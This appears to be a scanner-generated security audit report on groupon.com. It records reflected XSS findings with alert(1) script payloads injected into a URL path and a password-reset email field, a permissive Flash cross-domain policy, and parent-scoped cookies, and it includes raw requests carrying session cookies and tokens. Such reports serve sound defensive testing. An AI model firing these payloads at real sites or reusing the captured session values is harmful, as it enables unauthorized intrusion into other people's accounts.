The value of REST URL parameter 6 is copied into an HTML comment. The payload 3f69b--><script>alert(1)</script>77e1fcaaef1 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /blog/wp-content/themes/groublogpon/js/sound.js3f69b--><script>alert(1)</script>77e1fcaaef1 HTTP/1.1/blog/;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; __utma=44473723.1850810143.1313841127.1313841127.1313841127.1; __utmb=44473723.12.7.1313841167628; __utmc=44473723; __utmz=44473723.1313841127.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|1=Exp-deal-page-081811=NowRightRail%2FRightRailV1=1,2=Exp-places-080311=Places1%2Fgroup2=1; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85
Response
HTTP/1.1 404 Not Found/blog/xmlrpc.php/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" dir="ltr" lang="en-US">...[SNIP]... /blog/wp-content/themes/groublogpon/js/sound.js3f69b--><script>alert(1)</script>77e1fcaaef1 ) in 0.98817 seconds, on Aug 20th, 2011 at 11:58 am UTC. -->...[SNIP]...
1.34. http://www.groupon.com/users/send_password_reset [user%5Bemail_address%5D parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/users/send_password_reset
Issue detail
The value of the user%5Bemail_address%5D request parameter is copied into the HTML document as plain text between tags. The payload 7b378<script>alert(1)</script>db6bb32115c was submitted in the user%5Bemail_address%5D parameter. This input was echoed unmodified in the application's response.
Request
POST /users/send_password_reset HTTP/1.1/users/forgot_password-urlencoded/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; _chartbeat2=e8v98moqfru8d0uh; _tpref=http%3A%2F%2Fwww.grouponworks.com%2F; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85; __utma=44473723.936981430.1313841222.1313841222.1313841222.1; __utmb=44473723.23.7.1313841295603; __utmc=44473723; __utmz=44473723.1313841222.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|1=Exp-deal-page-081811=NowRightRail%2FRightRailV1=1,2=Exp-places-080311=Places1%2Fgroup2=1_token=r1M203F0Ir4AsHf7OkBQViXsP4HUiV7QpXuxNGPWJbQ%3D&user%5Bemail_address%5D=test%40fastdial.net7b378<script>alert(1)</script>db6bb32115c &commit=Submit
Response
HTTP/1.1 200 OK%40fastdial.net7b378%3Cscript%3Ealert%281%29%3C%2Fscript%3Edb6bb32115c; path=/; expires=Fri, 20-Aug-2021 12:02:09 GMT-00505695132feda0ddd2b7fc4919f1ab70d9; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 12:02:09 GMT-00505695132feda0ddd2bffd1f86d52c29e4; domain=.groupon.com; path=/5cd9413eccf2f0262cec50; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 12:02:09 GMT; HttpOnlyf5e61d015b488".facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->...[SNIP]... 7b378<script>alert(1)</script>db6bb32115c ....[SNIP]...
2. Flash cross-domain policy
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain.
Issue background
The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.
Issue remediation
You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.
Request
GET /crossdomain.xml HTTP/1.0
Response
HTTP/1.0 200 OK.com/xml/dtds/cross-domain-policy.dtd">-policies="all"/>...[SNIP]... * " to-ports="80,443" secure="false" />...[SNIP]...
3. Cookie scoped to parent domain
previous
next
There are 21 instances of this issue:
Issue background
A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.
Issue remediation
By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
3.1. http://www.groupon.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:_tpref=http%3A%2F%2Fliveoffgroupon.com%2F; domain=.groupon.com; path=/; expires=Sat, 27-Aug-2011 12:00:16 GMT b=e4d26f04-cb22-11e0-a02d-00505695132feda0ddd21b34888624731607; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 12:00:16 GMT s=e4d27710-cb22-11e0-a02d-00505695132feda0ddd2466decd454241042; domain=.groupon.com; path=/ _thepoint=46ad16a97121726e6fb720f93a27ac9c; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 12:00:16 GMT; HttpOnly
Request
GET / HTTP/1.1//xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; _chartbeat2=e8v98moqfru8d0uh; _tpref=http%3A%2F%2Fhire.jobvite.com%2FCompanyJobs%2FCareers.aspx%3Fc%3DqcZ9VfwZ%26jvresize%3Dhttp%3A%2F%2Fwww.groupon.com%2Fpages%2Fgroupon-jobs-frameresize; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85; __utma=44473723.936981430.1313841222.1313841222.1313841222.1; __utmb=44473723.17.7.1313841243632; __utmc=44473723; __utmz=44473723.1313841222.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|1=Exp-deal-page-081811=NowRightRail%2FRightRailV1=1,2=Exp-places-080311=Places1%2Fgroup2=1
Response
HTTP/1.1 302 Moved TemporarilySet-Cookie: _tpref=http%3A%2F%2Fliveoffgroupon.com%2F; domain=.groupon.com; path=/; expires=Sat, 27-Aug-2011 12:00:16 GMT Set-Cookie: b=e4d26f04-cb22-11e0-a02d-00505695132feda0ddd21b34888624731607; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 12:00:16 GMT Set-Cookie: s=e4d27710-cb22-11e0-a02d-00505695132feda0ddd2466decd454241042; domain=.groupon.com; path=/ Set-Cookie: _thepoint=46ad16a97121726e6fb720f93a27ac9c; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 12:00:16 GMT; HttpOnly /dallas/.com/dallas/">redirected</a>.</body></html>
3.2. http://www.groupon.com/about
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/about
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:b=e4d26f04-cb22-11e0-a02d-00505695132feda0ddd2543d031307d0cd65; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:57:49 GMT s=e4d27710-cb22-11e0-a02d-00505695132feda0ddd21b1d474f398584c0; domain=.groupon.com; path=/ _thepoint=1202837507e7caebb143ba57b628ed99; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 11:57:49 GMT; HttpOnly
Request
GET /about HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; __utma=44473723.1850810143.1313841127.1313841127.1313841127.1; __utmb=44473723.12.7.1313841167628; __utmc=44473723; __utmz=44473723.1313841127.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|1=Exp-deal-page-081811=NowRightRail%2FRightRailV1=1,2=Exp-places-080311=Places1%2Fgroup2=1; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85
Response
HTTP/1.1 200 OKSet-Cookie: b=e4d26f04-cb22-11e0-a02d-00505695132feda0ddd2543d031307d0cd65; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:57:49 GMT Set-Cookie: s=e4d27710-cb22-11e0-a02d-00505695132feda0ddd21b1d474f398584c0; domain=.groupon.com; path=/ Set-Cookie: _thepoint=1202837507e7caebb143ba57b628ed99; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 11:57:49 GMT; HttpOnly 86a9ef714ba9a".facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->...[SNIP]...
3.3. http://www.groupon.com/ch/getaways/subscriptions/new
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/ch/getaways/subscriptions/new
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:b=e4d26f04-cb22-11e0-a02d-00505695132feda0ddd2bf450bd41f6b1f04; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:56:19 GMT s=e4d27710-cb22-11e0-a02d-00505695132feda0ddd2da03e4f5110a34e8; domain=.groupon.com; path=/ _thepoint=41ff7cae1d1f5519ee0d9661c0bdf1fd; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 11:56:20 GMT; HttpOnly
Request
GET /ch/getaways/subscriptions/new HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; __utma=44473723.1850810143.1313841127.1313841127.1313841127.1; __utmb=44473723.9.7.1313841167628; __utmc=44473723; __utmz=44473723.1313841127.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|1=Exp-deal-page-081811=NowRightRail%2FRightRailV1=1,2=Exp-places-080311=Places1%2Fgroup2=1; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85
Response
HTTP/1.1 200 OKSet-Cookie: b=e4d26f04-cb22-11e0-a02d-00505695132feda0ddd2bf450bd41f6b1f04; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:56:19 GMT Set-Cookie: s=e4d27710-cb22-11e0-a02d-00505695132feda0ddd2da03e4f5110a34e8; domain=.groupon.com; path=/ Set-Cookie: _thepoint=41ff7cae1d1f5519ee0d9661c0bdf1fd; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 11:56:20 GMT; HttpOnly 6dfb017a54bd4"/xhtml1/DTD/xhtml1-transitional.dtd">.facebook.com/2008/fbml' xmlns='http://www...[SNIP]...
3.4. http://www.groupon.com/dallas/all
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/dallas/all
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:b=e4d26f04-cb22-11e0-a02d-00505695132feda0ddd2fb024e77223485b5; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:55:12 GMT s=e4d27710-cb22-11e0-a02d-00505695132feda0ddd2efdc319c4bf28326; domain=.groupon.com; path=/ _thepoint=6ff8e56537092c69b1fcd789c8d410d4; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 11:55:13 GMT; HttpOnly
Request
GET /dallas/all HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85; __utma=44473723.1850810143.1313841127.1313841127.1313841127.1; __utmb=44473723.4.9.1313841158728; __utmc=44473723; __utmz=44473723.1313841127.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|2=Exp-places-080311=Places1%2Fgroup2=1
Response
HTTP/1.1 200 OKSet-Cookie: b=e4d26f04-cb22-11e0-a02d-00505695132feda0ddd2fb024e77223485b5; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:55:12 GMT Set-Cookie: s=e4d27710-cb22-11e0-a02d-00505695132feda0ddd2efdc319c4bf28326; domain=.groupon.com; path=/ Set-Cookie: _thepoint=6ff8e56537092c69b1fcd789c8d410d4; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 11:55:13 GMT; HttpOnly 72f5c10b6b19b".facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->...[SNIP]...
3.5. http://www.groupon.com/g-team
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/g-team
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:b=e4d26f04-cb22-11e0-a02d-00505695132feda0ddd2543d031307d0cd65; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:57:39 GMT s=e4d27710-cb22-11e0-a02d-00505695132feda0ddd21b1d474f398584c0; domain=.groupon.com; path=/ _thepoint=1202837507e7caebb143ba57b628ed99; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 11:57:39 GMT; HttpOnly
Request
GET /g-team HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; __utma=44473723.1850810143.1313841127.1313841127.1313841127.1; __utmb=44473723.12.7.1313841167628; __utmc=44473723; __utmz=44473723.1313841127.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|1=Exp-deal-page-081811=NowRightRail%2FRightRailV1=1,2=Exp-places-080311=Places1%2Fgroup2=1; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85
Response
HTTP/1.1 200 OKSet-Cookie: b=e4d26f04-cb22-11e0-a02d-00505695132feda0ddd2543d031307d0cd65; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:57:39 GMT Set-Cookie: s=e4d27710-cb22-11e0-a02d-00505695132feda0ddd21b1d474f398584c0; domain=.groupon.com; path=/ Set-Cookie: _thepoint=1202837507e7caebb143ba57b628ed99; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 11:57:39 GMT; HttpOnly 933a541c894bf".facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->...[SNIP]...
3.6. http://www.groupon.com/getaways
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/getaways
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:b=e4d26f04-cb22-11e0-a02d-00505695132feda0ddd2b8d8f685eca64051; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:55:49 GMT s=e4d27710-cb22-11e0-a02d-00505695132feda0ddd2c5f561564208c98f; domain=.groupon.com; path=/ _thepoint=63c0eb0b8e0b397e4511672da24cbaaa; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 11:55:49 GMT; HttpOnly
Request
GET /getaways?d=travel_countmein HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; __utma=44473723.1850810143.1313841127.1313841127.1313841127.1; __utmb=44473723.8.7.1313841167628; __utmc=44473723; __utmz=44473723.1313841127.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|1=Exp-deal-page-081811=NowRightRail%2FRightRailV1=1,2=Exp-places-080311=Places1%2Fgroup2=1; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85
Response
HTTP/1.1 302 Moved TemporarilySet-Cookie: b=e4d26f04-cb22-11e0-a02d-00505695132feda0ddd2b8d8f685eca64051; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:55:49 GMT Set-Cookie: s=e4d27710-cb22-11e0-a02d-00505695132feda0ddd2c5f561564208c98f; domain=.groupon.com; path=/ Set-Cookie: _thepoint=63c0eb0b8e0b397e4511672da24cbaaa; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 11:55:49 GMT; HttpOnly /getaways/subscriptions/new.com/ch/getaways/subscriptions/new">redirected</a>.</body></html>
3.7. http://www.groupon.com/jobs
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/jobs
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:b=e4d26f04-cb22-11e0-a02d-00505695132feda0ddd290b2659c55b1fd6e; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:58:39 GMT s=e4d27710-cb22-11e0-a02d-00505695132feda0ddd264a895d76ea2aaa; domain=.groupon.com; path=/ _thepoint=c59f438b255f6fb102a5df9007c0345e; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 11:58:39 GMT; HttpOnly
Request
GET /jobs HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85; __utma=44473723.936981430.1313841222.1313841222.1313841222.1; __utmb=44473723.4.10.1313841222; __utmc=44473723; __utmz=44473723.1313841222.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|2=Exp-places-080311=Places1%2Fgroup2=1
Response
HTTP/1.1 200 OKSet-Cookie: b=e4d26f04-cb22-11e0-a02d-00505695132feda0ddd290b2659c55b1fd6e; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:58:39 GMT Set-Cookie: s=e4d27710-cb22-11e0-a02d-00505695132feda0ddd264a895d76ea2aaa; domain=.groupon.com; path=/ Set-Cookie: _thepoint=c59f438b255f6fb102a5df9007c0345e; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 11:58:39 GMT; HttpOnly 42c8805768d14".facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->...[SNIP]...
3.8. http://www.groupon.com/learn
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/learn
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:_tpref=http%3A%2F%2Forigin.groublogpon.com%2F%3Fs%3Dxss; domain=.groupon.com; path=/; expires=Sat, 27-Aug-2011 12:02:51 GMT b=54035a9a-cb24-11e0-b2e0-005056926806; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 12:02:51 GMT s=54036166-cb24-11e0-b2e0-005056926806; domain=.groupon.com; path=/ _thepoint=705bbf2e434a090a3e7beda2398975ab; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 12:02:51 GMT; HttpOnly
Request
GET /learn HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7.com/?s=xss.340368620.1313841586.1313841586.1313841586.1; __utmb=172649589.4.10.1313841586; __utmc=172649589; __utmz=172649589.1313841586.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; _chartbeat2=ts2s2t371e5yxuld
Response
HTTP/1.1 200 OKSet-Cookie: _tpref=http%3A%2F%2Forigin.groublogpon.com%2F%3Fs%3Dxss; domain=.groupon.com; path=/; expires=Sat, 27-Aug-2011 12:02:51 GMT Set-Cookie: b=54035a9a-cb24-11e0-b2e0-005056926806; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 12:02:51 GMT Set-Cookie: s=54036166-cb24-11e0-b2e0-005056926806; domain=.groupon.com; path=/ Set-Cookie: _thepoint=705bbf2e434a090a3e7beda2398975ab; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 12:02:51 GMT; HttpOnly 9250396ef13f8".facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->...[SNIP]...
3.9. http://www.groupon.com/merchants/welcome
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/merchants/welcome
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:_tpref=http%3A%2F%2Fwww.grouponworks.com%2F; domain=.groupon.com; path=/; expires=Sat, 27-Aug-2011 12:01:06 GMT b=e4d26f04-cb22-11e0-a02d-00505695132feda0ddd2e0d0571e3cf7eeb9; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 12:01:06 GMT s=e4d27710-cb22-11e0-a02d-00505695132feda0ddd2e7daddb9cb120594; domain=.groupon.com; path=/ _thepoint=61066a37ef4fedd9ee2bc8af30438c41; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 12:01:07 GMT; HttpOnly
Request
GET /merchants/welcome HTTP/1.1.com//xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; _chartbeat2=e8v98moqfru8d0uh; _tpref=http%3A%2F%2Fliveoffgroupon.com%2F; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85; __utma=44473723.936981430.1313841222.1313841222.1313841222.1; __utmb=44473723.21.7.1313841295603; __utmc=44473723; __utmz=44473723.1313841222.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|1=Exp-deal-page-081811=NowRightRail%2FRightRailV1=1,2=Exp-places-080311=Places1%2Fgroup2=1
Response
HTTP/1.1 200 OKSet-Cookie: _tpref=http%3A%2F%2Fwww.grouponworks.com%2F; domain=.groupon.com; path=/; expires=Sat, 27-Aug-2011 12:01:06 GMT Set-Cookie: b=e4d26f04-cb22-11e0-a02d-00505695132feda0ddd2e0d0571e3cf7eeb9; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 12:01:06 GMT Set-Cookie: s=e4d27710-cb22-11e0-a02d-00505695132feda0ddd2e7daddb9cb120594; domain=.groupon.com; path=/ Set-Cookie: _thepoint=61066a37ef4fedd9ee2bc8af30438c41; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 12:01:07 GMT; HttpOnly a2c56d220da1f".facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->...[SNIP]...
3.10. http://www.groupon.com/mobile
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/mobile
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:b=e4d26f04-cb22-11e0-a02d-00505695132feda0ddd2543d031307d0cd65; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:57:48 GMT s=e4d27710-cb22-11e0-a02d-00505695132feda0ddd21b1d474f398584c0; domain=.groupon.com; path=/ _thepoint=1202837507e7caebb143ba57b628ed99; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 11:57:48 GMT; HttpOnly
Request
GET /mobile HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; __utma=44473723.1850810143.1313841127.1313841127.1313841127.1; __utmb=44473723.12.7.1313841167628; __utmc=44473723; __utmz=44473723.1313841127.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|1=Exp-deal-page-081811=NowRightRail%2FRightRailV1=1,2=Exp-places-080311=Places1%2Fgroup2=1; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85
Response
HTTP/1.1 200 OKSet-Cookie: b=e4d26f04-cb22-11e0-a02d-00505695132feda0ddd2543d031307d0cd65; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:57:48 GMT Set-Cookie: s=e4d27710-cb22-11e0-a02d-00505695132feda0ddd21b1d474f398584c0; domain=.groupon.com; path=/ Set-Cookie: _thepoint=1202837507e7caebb143ba57b628ed99; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 11:57:48 GMT; HttpOnly f1ad4020f211b".facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->...[SNIP]...
3.11. http://www.groupon.com/now
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/now
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:b=e4d26f04-cb22-11e0-a02d-00505695132feda0ddd2a878fda7a55a2d3f; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:55:29 GMT s=eda0ddd2d57635565704e948; domain=.groupon.com; path=/ _thepoint=6ff8e56537092c69b1fcd789c8d410d4; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 11:55:30 GMT; HttpOnly
Request
GET /now HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; __utma=44473723.1850810143.1313841127.1313841127.1313841127.1; __utmb=44473723.4.9.1313841158728; __utmc=44473723; __utmz=44473723.1313841127.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|2=Exp-places-080311=Places1%2Fgroup2=1; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85
Response
HTTP/1.1 200 OKSet-Cookie: b=e4d26f04-cb22-11e0-a02d-00505695132feda0ddd2a878fda7a55a2d3f; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:55:29 GMT Set-Cookie: s=eda0ddd2d57635565704e948; domain=.groupon.com; path=/ =true; path=/Set-Cookie: _thepoint=6ff8e56537092c69b1fcd789c8d410d4; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 11:55:30 GMT; HttpOnly 846336d1724ef".facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->...[SNIP]...
3.12. http://www.groupon.com/pages/affiliates
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/pages/affiliates
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:b=e4d26f04-cb22-11e0-a02d-00505695132feda0ddd2835215e7457c8e54; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:57:25 GMT s=e4d27710-cb22-11e0-a02d-00505695132feda0ddd2855dfa8cae677beb; domain=.groupon.com; path=/ _thepoint=67b5ed9140d92a28cd3b4e873e6252c1; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 11:57:25 GMT; HttpOnly
Request
GET /pages/affiliates HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85; __utma=44473723.1850810143.1313841127.1313841127.1313841127.1; __utmb=44473723.10.7.1313841167628; __utmc=44473723; __utmz=44473723.1313841127.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|1=Exp-deal-page-081811=NowRightRail%2FRightRailV1=1,2=Exp-places-080311=Places1%2Fgroup2=1
Response
HTTP/1.1 200 OKSet-Cookie: b=e4d26f04-cb22-11e0-a02d-00505695132feda0ddd2835215e7457c8e54; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:57:25 GMT Set-Cookie: s=e4d27710-cb22-11e0-a02d-00505695132feda0ddd2855dfa8cae677beb; domain=.groupon.com; path=/ Set-Cookie: _thepoint=67b5ed9140d92a28cd3b4e873e6252c1; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 11:57:25 GMT; HttpOnly d1227d6a90fb1".facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->...[SNIP]...
